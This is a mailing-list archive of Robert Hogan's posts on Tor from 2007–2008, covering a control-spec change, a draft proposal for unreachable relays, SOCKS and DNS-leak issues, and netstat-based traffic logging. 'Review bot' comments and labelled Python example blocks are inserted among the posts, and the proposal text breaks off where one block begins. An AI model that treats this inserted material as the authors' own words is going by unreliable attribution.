 existing Tor nodes. But we didn't find any. Maybe we do in this
 discussion.

 [1] http://ulm.ccc.de/Rheintal
 [2] http://www.dingens.org

 regards






Re: Weird-looking circuits in Vidalia

2008-03-26 Thread Robert Hogan
On Tuesday 25 March 2008 21:05:49 you wrote:
snip


 Ok, thanks for the info! How about replacing these strings with text like
 Directory Request in future? That would be a little more descriptive.

I was thinking the same thing recently. I even went so far as to start a
proposal - because there are numerous tunneled requests in Tor that aren't
user initiated these days. I didn't get very far with it, and I'm not sure it's
particularly straightforward in all cases. But it looks to be easy enough for
these tunneled requests.

Here's what I was thinking:

Motivation/Overview:

  Tor now tunnels a large number of network maintenance operations through
circuits on the Tor network. Many of these operations are not initiated by
the user. Both TorK and Vidalia display active connections to the user and
these maintenance operations may cause alarm, distress, and even panic if
displayed without at least some attempt at explanation. If Tor were to provide
a STREAM_PURPOSE string as an extension for the existing STREAM_EVENT,
controllers would be able to determine whether to display a stream to the
user, or more likely provide a mechanism for explaining the purpose
of the connection to the curious user.

Specify a new PURPOSE field for extended stream events as follows:

Index: doc/spec/control-spec.txt
===
--- doc/spec/control-spec.txt   (revision 14111)
+++ doc/spec/control-spec.txt   (working copy)
@@ -984,6 +984,7 @@
   650 SP STREAM SP StreamID SP StreamStatus SP CircID SP Target
   [SP REASON= Reason [ SP REMOTE_REASON= Reason ]]
   [SP SOURCE= Source] [ SP SOURCE_ADDR= Address : Port ]
+  [SP PURPOSE= Reason]
   CRLF

   StreamStatus =
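
Review bot: the added optional field is written as [SP PURPOSE= Reason], which reuses the Reason production that REASON= and REMOTE_REASON= already use two lines above, while the second hunk introduces a separate Purpose production for exactly this field. The line should read [SP PURPOSE= Purpose]; as written, someone implementing a controller from the grammar would expect stream-close reasons in this position rather than DIR_FETCH, USER and the other purpose values.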
@@ -1033,6 +1034,13 @@
that requested the connection, and can be (e.g.) used to look up the
requesting program.

+  Purpose = DIR_FETCH / UPLOAD_DESC / DNS_REQUEST /
+ USER /  DIRPORT_TEST
+
+   The PURPOSE field is provided only for NEW and NEWRESOLVE
+   events, and only if extended events are enabled (see 3.19).  Clients MUST
+   accept purposes not listed above.
+
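
Review bot: the Purpose production lists DIR_FETCH, UPLOAD_DESC, DNS_REQUEST, USER and DIRPORT_TEST without defining any of them, and the paragraph under it does not say what a controller should assume when the field is absent (events other than NEW and NEWRESOLVE, or extended events disabled). Since the motivation given for the change is letting a controller decide whether to show a stream to the user, add a one-line meaning for each value and state the default for a missing field. The name also differs from the STREAM_PURPOSE used in the motivation text, so pick one, and the double space in "USER /  DIRPORT_TEST" can be cleaned up at the same time.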




Proposal: Incorporate Unreachable ORs into the Tor Network

2008-03-22 Thread Robert Hogan
I'm not sure how much merit this proposal has, or how serious its problems
are. Does anyone have any thoughts on it? Are the problems I've outlined fatal,
or is there a problem with it I've missed? I suspect one or the other.


--

Filename: xxx-unreachable-ORs.txt
Title: Incorporate Unreachable ORs into the Tor Network
Author: Robert Hogan
Created: 2008-03-08
Status: Draft

Overview:

  Propose a scheme for harnessing the bandwidth of ORs who cannot currently
  participate in the Tor network because they can only make outbound
  TCP connections.

Motivation: 

  Restrictive local and remote firewalls are preventing many willing
  candidates from becoming ORs on the Tor network. These
  ORs have a casual interest in joining the network but their operator is not
  sufficiently motivated or adept to complete the necessary router or firewall
  configuration. The Tor network is losing out on their bandwidth. At the
  moment we don't even know how many such 'candidate' ORs there are.


Objective:

  1. Establish how many ORs are unable to qualify for publication because
     they cannot establish that their ORPort is reachable.

  2. Devise a method for making such ORs available to clients for circuit
     building without prejudicing their anonymity.

Proposal:

  ORs whose ORPort reachability testing fails a specified number of
  consecutive times should:
   1. Enlist themselves with the authorities setting a 'Fallback' flag. This
      flag indicates that the OR is up and running but cannot connect to
      itself.
   2. Open an orconn with all ORs whose fingerprint begins with the same
      byte as their own. The management of this orconn will be transferred
      entirely to the OR at the other end.
   3. The fallback OR should update its router status to contain the
      'Running' flag if it has managed to open an orconn with 3/4 of the ORs
      with an FP beginning with the same byte as its own.

  Tor ORs who are contacted by fallback ORs requesting an orconn should:
   1. Accept the orconn until they have reached a defined limit of orconn
      connections with fallback ORs.
   2. Should only accept such orconn requests from listed fallback ORs who
      have an FP beginning with the same byte as its own.

  Tor clients can include fallback ORs in the network by doing the
  following:
   1. When building a circuit, observe the fingerprint of each node they
      wish to connect to.
   2. When randomly selecting a node from the set of all eligible nodes,
      add all published, running fallback nodes to the set where the first
      byte of the fingerprint matches the previous node in the circuit.

Anonymity Implications:

  At least some, and possibly all, nodes on the network will have a set
  of nodes that only they and a few others can build circuits on.

1. This means that fallback ORs might be unsuitable for use as middlemen
   nodes, because if the exit node is the attacker it knows that the
   number of nodes that could be the entry guard in the circuit is
   reduced to roughly 1/256th of the network, or worse 1/256th of all
   nodes listed as Guards. For the same reason, fallback nodes would
   appear to be unsuitable for two-hop circuits.

2. This is not a problem if fallback ORs are always exit nodes. If
   the fallback OR is an attacker it will not be able to reduce the
   set of possible nodes for the entry guard any further than a normal,
   published OR.

Possible Attacks/Open Issues:

  1. Gaming Node Selection
Does running a fallback OR customized for a specific set of published ORs
improve an attacker's chances of seeing traffic from that set of published
ORs? Would such a strategy be any more effective than running published
ORs with other 'attractive' properties?

  2. DOS Attack
An attacker could prevent all other legitimate fallback ORs with a
given byte-1 in their FP from functioning by running 20 or 30 fallback ORs
and monopolizing all available fallback slots on the published ORs. 
This same attacker would then be in a position to monopolize all the
traffic of the fallback ORs on that byte-1 network segment. I'm not sure
what this would allow such an attacker to do.

  4. Circuit-Sniffing
An observer watching exit traffic from a fallback server will know that the
previous node in the circuit is one of a  very small, identifiable
subset of the total ORs in the network. To establish the full path of the
circuit they would only have to watch the exit traffic from the fallback
OR and all the traffic from the 20 or 30 ORs it is likely to be connected
to. This means it is substantially easier to establish all members of a
circuit which has a fallback OR as an exit (sniff and analyse 10-50 (i.e.
1/256 varying) + 1 ORs) rather than a normal published OR (sniff all 2560
or so ORs on the network). The same mechanism that allows the client to
expect a specific
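
The selection rules in the proposal above, modelled as an added example (not part of the original post and not Tor code): it builds a constructed 2560-relay network with ten published ORs per first fingerprint byte and shows the candidate set an observer is left with when the exit is a fallback OR. The function names, the open_slots parameter and the sample fingerprints are assumptions made for the illustration.

```python
"""Model of the fallback-OR rules from the proposal (illustration only)."""


def first_byte(fp):
    """First byte of a hex fingerprint, ignoring spaces and a leading '$'."""
    return fp.replace(" ", "").lstrip("$")[:2].upper()


def same_segment(nodes, fp):
    """Nodes whose fingerprint shares its first byte with `fp`."""
    return [n for n in nodes if first_byte(n) == first_byte(fp)]


def fallback_is_running(fallback_fp, published, connected):
    """The 3/4 rule: 'Running' once orconns exist to 3/4 of the segment."""
    segment = set(same_segment(published, fallback_fp))
    if not segment:
        return False
    return 4 * len(segment & set(connected)) >= 3 * len(segment)


def accept_orconn(own_fp, fallback_fp, listed_fallbacks, open_slots):
    """Published-OR side: listed fallbacks of the same segment, while slots remain.

    open_slots stands in for the proposal's unspecified 'defined limit'.
    """
    return (open_slots > 0
            and fallback_fp in listed_fallbacks
            and first_byte(fallback_fp) == first_byte(own_fp))


def next_hop_candidates(prev_fp, published, running_fallbacks):
    """Client side: every other published OR, plus fallbacks matching prev hop."""
    base = [p for p in published if p != prev_fp]
    return base + same_segment(running_fallbacks, prev_fp)


def previous_hop_candidates(exit_fp, published, running_fallbacks):
    """What someone watching the exit can infer about the hop before it."""
    if exit_fp in running_fallbacks:
        # Only ORs in the fallback's segment hold an orconn to it.
        return same_segment(published, exit_fp)
    return [p for p in published if p != exit_fp]


# Constructed sample network: 2560 published ORs, exactly ten per first byte.
PUBLISHED = [f"{i % 256:02X}{i:038X}" for i in range(2560)]
# Constructed fallback ORs in segments 3D and A0.
FALLBACKS = ["3D" + "F" * 38, "A0" + "F" * 38]


def anonymity_sets(published=PUBLISHED, fallbacks=FALLBACKS):
    """(candidates behind a normal exit, candidates behind a fallback exit)."""
    normal = previous_hop_candidates(published[0], published, fallbacks)
    via_fallback = previous_hop_candidates(fallbacks[0], published, fallbacks)
    return len(normal), len(via_fallback)


if __name__ == "__main__":
    normal, via_fallback = anonymity_sets()
    print(f"previous-hop candidates, published exit: {normal}")
    print(f"previous-hop candidates, fallback exit:  {via_fallback}")
```

The drop from the whole network to one segment is the size of the reduction the Circuit-Sniffing item describes, and it grows or shrinks only with how many published ORs happen to share the fallback's first byte.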

Re: Invalid uptime warning messages

2008-02-17 Thread Robert Hogan
On Sunday 17 February 2008 10:56:28 Olaf Selke wrote:
 Scott Bennett wrote:
   At 10:00 p.m. my tor server began issuing a warning message about a
  negative uptime:

 yep, the same here on blutmagie. TZ is UTC+1
 Feb 17 04:40:45.116 [warn] Invalid uptime -19907


The affected router appears to be 'crobertp'. It has the invalid uptime value
in its router descriptor:






Re: Invalid uptime warning messages

2008-02-17 Thread Robert Hogan
On Sunday 17 February 2008 12:10:40 Robert Hogan wrote:
 On Sunday 17 February 2008 10:56:28 Olaf Selke wrote:
  Scott Bennett wrote:
At 10:00 p.m. my tor server began issuing a warning message about
   a negative uptime:
 
  yep, the same here on blutmagie. TZ is UTC+1
  Feb 17 04:40:45.116 [warn] Invalid uptime -19907

 The affected router appears to be 'crobertp'. It has the invalid uptime
 value in its router descriptor:


250+desc/name/crobertp=
router crobertp 201.51.22.53 563 0 9030
platform Tor 0.1.1.24 on Linux i686
published 2008-02-17 09:03:34
opt fingerprint 3D18 77CA 3BBD 97A5 9D38 0640 6696 E692 420B EF67
uptime -19907
bandwidth 20480 51200 0

I've bcc'd the owner of the router so he can upgrade his Tor (0.1.1.24 must be 
deprecated by now).




Re: How to remove some useless nodes

2008-01-29 Thread Robert Hogan
On Monday 28 January 2008 18:34:52 F. Fox wrote:
 孙超 wrote:
  We in China use tor mainly for avoiding Great Fire Wall, which is a very
  strong internet censorship software operated by the government. So, if
  linkage with nodes within China is completely useless for us to break
  the censorship. Usually, we can cut off such connection in tor's graphic
  window vidalia manually, but it very bothering, we must keep an eye on
  whether there is linkage within China. I wonder if there is some way to
  remove nodes located in China.

 Although I'm not in a country like China, nor do I know a solution, do
 know that I support any effort which makes Tor a better tool for
 circumventing the Great Firewall.

 The ability to exclude nodes by [approximate] geography would be a nice
 feature; taking a look at TorStatus, I notice that the nodes (including
 my own) are already identified with their country of origin.

This isn't the first time I've plugged this feature of TorK and it probably 
won't be the last. Some of you seem to be Linux users, so this is just to let 
you know if you install TorK you can exclude routers on the basis of country 
code with a couple of clicks.

The caveat is that the identification of the router's country of origin is 
only as good as the maxmind geoip db - which is fairly reliable in 99.X% of 
cases.

http://tork.anonymityanywhere.com





Re: filesharing with tor and offsystem online storage

2008-01-20 Thread Robert Hogan
On Sunday 20 January 2008 00:38:35 Michael Schmidt wrote:
 Hi please have a look at the http://offsystem.sf.net
 If you want to distribute a file anonymously, upload it into the Offsystem
 and send the OFF-Link over Tor.
 That allows Tor to do anonymous Filesharing without any Bandwidth for the
 system.
 Offsystem is a kind of uncensorable Online Storage Hard Disk.

 Mike

There don't appear to be any source tarballs and looking at the cvs repository 
only the project members could possibly know how to put the many modules 
together. There don't appear to be any revision tags either. And there's no 
build documentation in plain sight.

That is seriously shoddy for an open source project. I'm sure offsystem is 
almost all that it says it is but the lack of all of the above make it as 
near a black box as your average closed source application. Annoying.





Re: Konqueror SOCKS with Tor+Privoxy

2008-01-20 Thread Robert Hogan
On Saturday 19 January 2008 23:36:35 Roger Dingledine wrote:
 On Sat, Jan 19, 2008 at 03:31:51PM -0800, Ned Bun wrote:
  I can't find an answer to this question anywhere.

 You might find
 https://www.torproject.org/docs/tor-doc-web
 to be useful.

  In using Konqueror with Tor and Privoxy, should the SOCKS settings in
  Konqueror's Settings-Configure Konqueror-Proxy-SOCKS be configured
  in some way? It seems to work fine without the SOCKS section
  configured, but leaving the Enable SOCKS support box unchecked
  disturbs me slightly. Should this section need configuration if
  everything appears to be working? Why are instructions for Firefox for
  SOCKS always specified but when it comes to Konqueror, no one says
  anything about the SOCKS configuration area?

 You should configure the socks part too. The reason is that browsers
 have a habit of supporting all sorts of weird protocols besides http and
 https, and if some webpage gives you (over Tor) a link that points to
 one of those other protocols, then your browser will fetch it without
 going through any proxies. If you specify a socks proxy, your browser
 should [*] use the socks proxy for all other protocols.

 (I say should because I have no idea what bugs konqueror has where
 it decides it's smarter than you and shouldn't use a proxy for some
 situation.)


For some reason Konqueror doesn't support socksifying to a tcp port - only the 
library detection and loading that Ned describes. It's hardcoded to detect 
any of the following files in the usual paths (or a path you specify):

_libNames << "libsocks.so"      // Dante
          << "libdsocksd.so.0"  // Dante 1.1.14-2 on
                                // Debian unstable 17-12-2003
          << "libsocks5.so"     // ?
          << "libsocks5_sh.so"; // NEC


Many of Konqueror's IO slaves (e.g. smb:/, fish:/ for obvious reasons) don't 
respect its proxy settings so if the user assumes that the window, rather 
than the protocol, is anonymized then that will be a problem.

However, installing Dante is also a problem because then *every* ioslave 
starts using it, including pop3, smtp and so on.

So a rock and a hard place. TorK, which supports using Konqueror, needs to 
alert the user that Konqueror can only be safely used for http and https. As 
other posters have noted, Konqueror is quite secure in some respects, but 
its pretty crap socks support and the integration of ioslaves into the 
interface are a problem.








Re: filesharing with tor and offsystem online storage

2008-01-20 Thread Robert Hogan
On Sunday 20 January 2008 18:19:30 Michael Schmidt wrote:
 Hi Robert,

 source is here:
 http://offsystem.cvs.sourceforge.net/offsystem/?sortdir=down

 On Jan 20, 2008 7:05 PM, Robert Hogan [EMAIL PROTECTED] wrote:
  There don't appear to be any source tarballs and looking at the cvs
  repository
  only the project members could possibly know how to put the many modules
  together.

Yes, that's the cvs repository I was referring to above - there are no tags 
there and no source tarballs anywhere else. This means that there is no 
source distribution for any of their releases. That's annoying.

I'm guessing that off_network is the main module there but why should I bother 
reverse-engineering their build process just to install a possibly broken cvs 
version? I want the latest release. It's their funeral at the end of the day 
but an open-source project that doesn't release source tarballs is just being 
silly. 




Re: Pidgin and Gajim are both DNS-leaking, what IM-tool for Jabber are you using?

2008-01-11 Thread Robert Hogan
On Friday 11 January 2008 05:15:13 Scott Bennett wrote:

  I'm assuming the patch is to get tsocks to do name resolution via a
 socks proxy using 4a or 5.  If that is correct, where can I get the patch,
 please? I'm running FreeBSD 6.3-PRERELEASE, but haven't updated my ports
 tree in months (since before the X.org 6.9 -- 7.2 ports freeze), so I'll
 need to patch it directly.


http://www.totalinfosecurity.com/patches/tor.php

Hope this helps.




Re: Pidgin and Gajim are both DNS-leaking, what IM-tool for Jabber are you using?

2008-01-11 Thread Robert Hogan
On Friday 11 January 2008 22:02:52 Robert Hogan wrote:
 On Friday 11 January 2008 05:15:13 Scott Bennett wrote:
   I'm assuming the patch is to get tsocks to do name resolution via a
  socks proxy using 4a or 5.  If that is correct, where can I get the
  patch, please? I'm running FreeBSD 6.3-PRERELEASE, but haven't updated my
  ports tree in months (since before the X.org 6.9 -- 7.2 ports freeze),
  so I'll need to patch it directly.

 http://www.totalinfosecurity.com/patches/tor.php

 Hope this helps.

Oh dear. That link seems to be dead now. Though it does redirect to a picture 
of pretty young things pointing at pie-charts on a laptop... mmm, secuuure.

http://wiki.noreply.org/noreply/TheOnionRouter/TSocksPatches seems to be the 
place to look for the patch sources these days.




Re: Pidgin and Gajim are both DNS-leaking, what IM-tool for Jabber are you using?

2008-01-10 Thread Robert Hogan
On Thursday 10 January 2008 17:39:54 kazaam wrote:
 Hi,
 I tested today Pidgin and Gajim for DNS-leaking and found that both are
 doing it. In Both you can't circumvent it. Even when using a http-proxy
 they still resolve the dns by themselves not using the proxy. What is your
 preferred IM-application for jabber?

 greets

For the likes of Pidgin and Gaim you're better off using the patched version 
of tsocks. If you're a Linux user, TorK offers a one-click way to launch 
pidgin or gaim socksified by the non-dns-leaking tsocks through tor. To get
this to work all you have to do is install TorK. It also has a 'failsafe' option
that (with the tor 0.2.x series) will route all your system's dns traffic
through Tor.

Disclaimer: I'm the developer of TorK. (http://tork.sf.net)
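
An added example, not part of the thread and not the tsocks patch itself: the CONNECT requests a client sends under SOCKS4, SOCKS4a and SOCKS5, with a classifier that tells whether the proxy was handed a hostname (so the proxy side resolves it) or only an IP address (so any lookup already happened on the client, outside the proxy). The function names and the sample hosts are assumptions made for the illustration.

```python
import ipaddress
import struct


def socks4_connect(target, port, userid=b""):
    """SOCKS4 CONNECT for an IPv4 literal, SOCKS4a CONNECT for a hostname."""
    head = struct.pack(">BBH", 4, 1, port)      # VN=4, CD=1 (CONNECT), DSTPORT
    try:
        return head + ipaddress.IPv4Address(target).packed + userid + b"\x00"
    except ipaddress.AddressValueError:
        # SOCKS4a: DSTIP 0.0.0.x with x != 0 means "resolve the name that follows".
        return (head + b"\x00\x00\x00\x01" + userid + b"\x00"
                + target.encode("ascii") + b"\x00")


def socks5_connect(target, port):
    """SOCKS5 CONNECT request (the message sent after method negotiation)."""
    try:
        addr = b"\x01" + ipaddress.IPv4Address(target).packed    # ATYP=1, IPv4
    except ipaddress.AddressValueError:
        name = target.encode("ascii")
        addr = b"\x03" + bytes([len(name)]) + name               # ATYP=3, domain
    return b"\x05\x01\x00" + addr + struct.pack(">H", port)


def classify(request):
    """Return (protocol, target, resolver) for a captured CONNECT request.

    resolver is "proxy" when the request carries a hostname and "client" when
    the proxy only ever saw an address.
    """
    if request[0] == 4:
        dstip, rest = request[4:8], request[8:].split(b"\x00")
        if dstip[:3] == b"\x00\x00\x00" and dstip[3] != 0:
            return ("socks4a", rest[1].decode("ascii"), "proxy")
        return ("socks4", str(ipaddress.IPv4Address(dstip)), "client")
    if request[0] == 5:
        atyp = request[3]
        if atyp == 3:
            length = request[4]
            return ("socks5", request[5:5 + length].decode("ascii"), "proxy")
        if atyp == 1:
            return ("socks5", str(ipaddress.IPv4Address(request[4:8])), "client")
        if atyp == 4:
            return ("socks5", str(ipaddress.IPv6Address(request[4:20])), "client")
    raise ValueError("not a SOCKS4/4a/5 CONNECT request")


def leaking_requests(requests):
    """Classified requests that reached the proxy as a bare address."""
    classified = [classify(r) for r in requests]
    return [c for c in classified if c[2] == "client"]


# Constructed requests for the same Jabber server, by name and by address.
SAMPLE = [
    socks4_connect("192.0.2.10", 5222),
    socks4_connect("jabber.example.org", 5222),
    socks5_connect("192.0.2.10", 5222),
    socks5_connect("jabber.example.org", 5222),
]

if __name__ == "__main__":
    for proto, target, resolver in map(classify, SAMPLE):
        print(f"{proto:8} {target:20} name resolved by: {resolver}")
```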




Re: Missing key from authority?

2008-01-10 Thread Robert Hogan
On Wednesday 09 January 2008 21:22:54 Tom Hek wrote:
 Hello,

 This message started flooding my logs: Jan 09 22:19:27.260 [notice]
 We're missing a certificate from authority tor26 with signing key
 : launching request.

 A friend of my has exact the same message flooding over his log. We
 are both running 0.2.0.15-alpha. OS on my box is FreeBSD and on his
 box Debian, so I think this message is not OS related but it's related
 to the authority. Is someone else having the same message lately?

 Tom

This seems to be fixed in the latest svn revision. You can try it out by 
doing:

mkdir ~/torsvn
cd ~/torsvn
svn checkout https://tor-svn.freehaven.net/svn/tor/trunk tor
cd tor
./autogen.sh





Re: netstat reporting destinion IP address

2007-11-25 Thread Robert Hogan
On Sunday 25 November 2007 02:23:18 anonym wrote:
 On 25/11/07 02:54, Gregory Maxwell wrote:
  On 11/24/07, anonym [EMAIL PROTECTED] wrote:

  Even though we still get as much anonymity as Tor offers and netstat is
  wrong in some way I really do not want this to happen. Incognito uses
  TorK as a control GUI to Tor, and since its Non-Tor traffic log uses
  netstat and thus will log these erroneous connections, users might freak
  out and think that Incognito is unsafe. In fact, that was what happened
  to me. Can this be fixed?
 
  Yes. Don't do that.
 
  it would be better if you were running something that sniffed the
  network and showed the user all outbound packets that were not TOR.

Absolutely. The use of netstat for the gui (at the moment) is intended to
alert the user to chronic non-anonymous traffic and is flagged in the gui
as 'Not 100% reliable'. The use-case is: OK I'm visiting this site
anonymously but is it generating stateful traffic I'm not necessarily
expecting?

That log window has been there since the year dot and can definitely be 
improved on. The simplest approach I can think of is a setuid libpcap-based 
program to replace the use of netstat. The word 'setuid' rings alarm-bells 
though and I would certainly welcome advice on how much harm such a thing 
could cause. (Installing an rc.d launched daemon is very hard to do in a
(linux) platform agnostic way, so if someone is suggesting such an approach
I would appreciate input on how to implement it properly).

Would libpcap capture stateless/connectionless traffic though?


 That would be better but my concern is mainly with TorK, and it uses
 netstat for its logs. I don't expect the average Incognito user to
 monitor netstat, but they might very well find some misleading
 information in Tork's logs (as they are very easily accessible through a
 nice GUI and all). Well, I guess this is an issue with TorK. Hopefully
 Robert Hogan (TorK's maintainer) will read this, although my problem
 might be a bit too specific to justify a fix which I guess would turn
 out much more complex than the current solution with netstat.


The 'real' solution is definitely still to be found. The information from
netstat is misleading because it is using the /proc filesystem to gather
that, and that's at least one level up from the packet-munging taking place
in netfilter (according to my simplistic understanding). It will always be
misleading. Maybe even the info from libpcap would be misleading. Could you
try out pktstat (which I learned of on #tor and uses libpcap) and see if the
correct info gets reported?

Another candidate is ip_conntrack, but again a root-owned daemon would be 
required. Anyone with wisdom to spare on this listening?

  Just looking at netstat may well miss short-lived (and especially
  connectionless) packets which are probably much more of a significant
  real threat to the user.

Agreed. TorK tries to guard against these for the non-incognito user by
providing two 'fail safe' options (DNS Failsafe, and 'System Failsafe') which
route DNS and sensitive, encrypted traffic respectively through Tor. The
traffic that's routed is configurable for both options.


 If I'm not mistaken, Tor circuits are long-lived enough to show up (?).

The connection to the Tor server at the start of the circuit shows up there 
alright, and yes they are long-lived enough generally.

 Or are you suggesting that Tor initiates other connections as some sort
 of intermediate step (I'm certainly no expert on the inner workings of
 Tor)? Perhaps I wasn't clear enough, but the only Internet traffic that
 is allowed is made through Tor. Any way, I don't know exactly how TorK
 uses netstat to generate its log (I guess it uses --continuous which
 updates every second), but the entries in the log stay even though the
 connection has been disconnected (and netstat stops showing them).

Yes, it's intended as a record of your session, but is not retained between 
sessions and can be cleared at any time.


 Connectionless packets is not a problem as only TCP is allowed to leave
 the computer since UDP etc., as you pointed out, might be a real threat.
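
An added example, not part of the thread and not TorK's code: a snapshot check over the /proc/net/tcp table that netstat reads, flagging TCP sockets whose remote end is neither loopback nor a known Tor relay. The sample table, the relay address and the function names are constructed for the illustration, and the address decoding assumes a little-endian host.

```python
import ipaddress

# Kernel TCP state codes as they appear in the "st" column.
TCP_STATES = {
    "01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
    "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
    "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING",
}

# Constructed sample in /proc/net/tcp layout; not captured from a real host.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:235A 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 20001
   1: 0100007F:9C40 0100007F:235A 01 00000000:00000000 00:00000000 00000000  1000        0 20002
   2: 0A01A8C0:C350 076433C6:2329 01 00000000:00000000 00:00000000 00000000  1000        0 20003
   3: 0A01A8C0:C352 507100CB:0050 01 00000000:00000000 00:00000000 00000000  1000        0 20004
   4: 0A01A8C0:C354 507100CB:01BB 06 00000000:00000000 00:00000000 00000000     0        0 0
"""

# Assumed to come from the controller: the relays this client connects to.
KNOWN_TOR_RELAYS = {("198.51.100.7", 9001)}


def decode_endpoint(field):
    """'0100007F:235A' -> ('127.0.0.1', 9050) on a little-endian host."""
    addr_hex, port_hex = field.split(":")
    addr = ipaddress.IPv4Address(bytes.fromhex(addr_hex)[::-1])
    return str(addr), int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Parse the table into dicts with local, remote and state."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split()
        if len(parts) < 4:
            continue
        rows.append({
            "local": decode_endpoint(parts[1]),
            "remote": decode_endpoint(parts[2]),
            "state": TCP_STATES.get(parts[3], parts[3]),
        })
    return rows


def non_tor_connections(text, tor_relays):
    """TCP sockets whose peer is neither loopback nor a known Tor relay.

    This sees only TCP sockets still in the table when the snapshot is
    taken: UDP lives in /proc/net/udp, and anything opened and closed
    between two polls never appears.
    """
    flagged = []
    for row in parse_proc_net_tcp(text):
        ip, port = row["remote"]
        if row["state"] == "LISTEN":
            continue
        if ipaddress.ip_address(ip).is_loopback:
            continue                              # e.g. application -> local Tor
        if (ip, port) in tor_relays:
            continue                              # the Tor client's own connection
        flagged.append((ip, port, row["state"]))
    return flagged


if __name__ == "__main__":
    for ip, port, state in non_tor_connections(SAMPLE_PROC_NET_TCP, KNOWN_TOR_RELAYS):
        print(f"non-Tor TCP: {ip}:{port} ({state})")
```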






Re: server incorrectly believes IP address has changed

2007-11-20 Thread Robert Hogan

On Tuesday 20 November 2007 21:34:16 you wrote:

  cached-routers and cached-routers.new are not the file names used in
 0.2.0.12-alpha, but rather cached-descriptors and cached-descriptors.new,
 and in my original message, I wrote:

  I restarted my tor server a couple of hours ago, and since then, it
 has been acting very peculiarly.  Here are the notice-level log file
 entries since startup.  Note that I deleted cached-descriptors and
 cached-descriptors.new after shutting down tor and before shutting down
 the system several hours prior to this startup.


Ah, missed that. It looks like cached-routers is still a fallback though, so
if it is still there it will get read. In fact, if cached-routers *was* still
present that would explain why the address was noticeably out of date.



 occasion my own *guess* would be that tor is using the old IP stored there,
 especially since 66.225.42.30 was your address at one point:

 http://www.google.com/search?hl=en&q=mycroftsotherchild+66.225.42.30&btnG=Search

Whoops, 

  Yes, the ISP has a limited list of IP addresses that it assigns, so
 the same addresses do recur frequently.  In this case, I noted,

  Nov 20 06:29:37.282 [notice] Now checking whether ORPort 66.225.36.5:995
 and DirPort 66.225.36.5:443 are reachable... (this may take up to 20
 minutes -- look for log messages indicating success)

  Note that the above address was incorrect.  The correct address
 was, and still is, 66.225.42.30.  It has not changed since before the
 system was rebooted.

 Whether it's a good thing for Tor to just try the last known good address
 rather than figure it out all over again on the off-chance it may be out of
 date, I don't know.

  I thought the point of specifying a host+domain name in the Address 
 line was to get tor to *look it up in the name server net*.

 The tone of your comments below is unfair to Csaba. He was merely offering a
 friendly (and free) suggestion. No one would ever respond to anyone else on
 this list if that sort of thing was the default response.

  In that case, I apologize.  I took offense at the comments that
 appeared to ignore what I had written, while taking a very condescending
 tone and assuming I hadn't done the obvious checking before posting.



Thanks for taking the point!




Re: new perspektive for tor

2007-11-17 Thread Robert Hogan
On Friday 16 November 2007 17:04:18 Michael Schmidt wrote:
 Due to data retention log needs/law in the EU, there will be no
 outproxy and no forwarding-nodes in the EU anymore, if they do not
 log all traffic.

Can someone point me to the EU directive on this? I thought this was just a 
German initiative.




Re: new perspektive for tor

2007-11-17 Thread Robert Hogan
On Saturday 17 November 2007 14:42:56 you wrote:
 Hi Robert,

 On Sat, 17.11.2007, you wrote:
  Can someone point me to the EU directive on this? I thought this was just
  a German initiative.

 http://eur-lex.europa.eu/LexUriServ/LexUriServ.do?uri=OJ:L:2006:105:0054:01:EN:HTML


 felix

If you go to the bottom of that link you can see many countries appear to
be 'postponing' application of the directive indefinitely.




Why Are We Waiting for the Cavalry to Ride In? (was Re: court trial against me - the outcome)

2007-11-14 Thread Robert Hogan
On Wednesday 14 November 2007 14:22:29 Mirko Thiesen wrote:
 I
 asked What about a postal service that delivers i.e. a bomb or a blackmail
 letter? Do they help people committing crimes as well? They said that
 these two things could not be compared as a postal service offers
 transportation services whereas I offer anonymization services.


First of all, well done and keep up the good work.

Secondly, your case is proof, if proof were needed, that Tor is still a 
project without a rock-solid layman's analogy. Every Tor server operator that 
ends up explaining Tor to a non-technical or even just plain skeptical 
audience will encounter the same problem until the crack of doom unless we 
all put our heads together and document one.

Here is my stab to get things rolling:

Why should Internet usage be anonymous?
Because almost everything else in our life (e.g. TV, radio, the postal system, 
telephony, cash) has a great deal of anonymity built in. Imagine being asked 
to sign your name at the newsagents every time you buy a newspaper or being 
asked to fill out and sign a form detailing every radio program you listen 
to? What would your response be? Well, newspaper websites and internet radio 
broadcasters take your signature every time you use them. The information 
that establishes what you have listened to and what you have read on the 
internet is logged and stored centrally. So unlike the real world, the 
internet has no privacy built in. You are made to sign for everything. So 
unless you are proposing that we should sign a docket every time we read a 
newspaper article, unless you believe that paper money should be abolished 
because it allows people to purchase goods without creating a permanent 
record then you must believe that the same right to privacy we enjoy in a 
world with cash, radio, and television  pertains in a world with cash, radio, 
television plus the internet. 


Thirdly, Tor operators of the world need to unite. The Tor project is not our 
daddy. There is no Tor Project cavalry over the hill about to ride in with a 
coachload of free lawyers. We need to establish a fighting fund for exactly 
these sorts of cases. This fund needs to be managed by a campaign group in 
such a way that it doesn't undermine the anonymity of the network we all help 
provide. I believe informal ad-hoc donations won't cut it. There needs to be 
an organized body that can accumulate wisdom, develop public credibility and 
even distribute funds to cover basic legal costs or more. 

This could be organized along the following lines:

* The organization would be on a subscription basis. X euro/dollars a year.
* The organization would accept donations of all sorts.
* The organization would be registered as a campaign group/NGO (or whatever is 
appropriate) in as many countries as possible. This will require a country 
representative in as many countries as possible.
* Every subscribed member will be entitled to whatever the organization can 
afford within some reasonable minimum/maximum of protection.
* Maybe the organization could negotiate and take out some sort of legal 
insurance on behalf of its members? What sort of insurance would be 
appropriate? Is there such a thing?


I don't think any of the above is pie-in-the-sky. Tor server operators aren't 
anonymous. They already communicate/collaborate with each other regularly on 
IRC and this mailing list. When a tor operator is 'hassled by the feds' they 
deserve a lot more than tea and sympathy on or-talk. They deserve the 
resources of an organized association that has funds, expertise and a bit of 
a clout to ride in and back them up. Maybe we can wait for George Soros to 
read about Tor for that to happen, or maybe we can get organized and start 
defending  something we clearly all believe in.

There are all-sorts operating tor servers on this list. Who can tell us what 
concrete steps we need to take to set up a Tor Operator NGO? What's the best 
